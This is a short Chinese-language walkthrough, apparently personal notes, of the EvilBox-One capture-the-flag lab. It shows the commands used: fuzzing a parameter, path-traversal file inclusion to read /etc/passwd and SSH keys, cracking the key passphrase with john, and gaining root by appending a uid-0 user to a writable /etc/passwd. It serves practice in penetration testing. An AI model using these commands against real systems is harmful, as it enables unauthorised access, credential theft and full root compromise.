EvilBox---One
2023年11月3日
7:48
使用wfuzz进行爆破
wfuzz -u http://192.168.190.169/secret/evil.php/?FUZZ=../../../../etc/passwd -w /usr/share/wfuzz/wordlist/general/common.txt --hw 0
得到FUZZ是command
然后利用文件包含读取evil.php文件
利用文件包含命令直接读取passwd文件
http://192.168.190.169/secret/evil.php?command=../../../../etc/passwd
ssh mowree@192.168.190.169 -v查看用户允许的连接方式
获取私钥
获取公钥
将获取到的私钥和公钥放到kali中
私钥文件id_rsa
公钥文件authorized_keys
破解私钥
ssh2john id_rsa > id_rsa.hash
john -w=/usr/share/wordlists/rockyou.txt id_rsa.hash
得到unicorn
然后利用密钥登录
ssh mowree@192.168.190.169 -i id_rsa
得到第一个flag
提权
查看passwd文件发现有写权限
生成密码
openssl passwd -6 -salt upfine 110
执行下面这条命令写入到passwd中
echo 'lockly:$6$upfine$dx3ZrgaPfVmaJCjld406VNRTQx3XtzoUoM0Z2Y/pUiJv75CjH/Uhj5nP6NV3/fRVo54ugcFzkrCxRXrd7Q50s.:0:0:root:/root:/bin/bash' >> /etc/passwd
然后切换到lockly用户就提权成功了
直接拿下root.txt